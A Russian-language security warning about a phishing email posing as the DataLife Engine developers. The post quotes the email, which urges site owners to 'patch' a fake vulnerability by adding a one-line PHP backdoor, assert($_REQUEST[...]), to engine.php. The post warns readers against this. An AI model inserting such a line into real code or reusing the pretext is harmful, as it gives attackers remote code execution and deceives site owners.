Внимание! Мошеннические рассылки DLE 13.09.2014 (16:50)

С недавнего времени столкнулись с проблемой, одному из клиентов пришло фейковое (поддельное) письмо на электронный адрес.
ВНИМАНИЕ! Это ложное письмо, хотя и подделано так, что отправлено как-будто от разработчиков dle. Следовать инструкции крайне противопоказано! Разместив код указанный в письме, Вы самостоятельно создадите уязвимость на сайте, с помощью которой в дальнейшем будет осуществлен взлом Вашего сайта.
Содержание его следующее:


Уважаемые владельцы сайта,
благодарим вас за выбор системы управления сайтом «DataLife Engine».

Уведомляем вас о том, что силами наших специалистов была обнаружена критическая уязвимость во всех версиях «DataLife Engine». При помощи данной уязвимости злоумышленники могут легко получить доступ к панели управления уязвимого сайта. Проблема заключается в недостаточной фильтрации данных. Уязвимость является крупнейшей за все 10 лет разработки «DataLife Engine», примерно 90% сайтов на «Data Life Engine» могут быть взломаны при помощи неё.

К сожалению, ваш сайт входит в число уязвимых сайтов и может быть взломан в любой момент. Просим вас серьёзно отнестись к данной проблеме и устранить уязвимость, следуя инструкции ниже:

Для исправления откройте файл вашего сайта: /engine/engine.php и в самое начало файла после строчки:

<?php

добавьте:

assert($_REQUEST[DATALIFEENGINE]);

С уважением,
SoftNews Media Group.

bags@dle-news.ru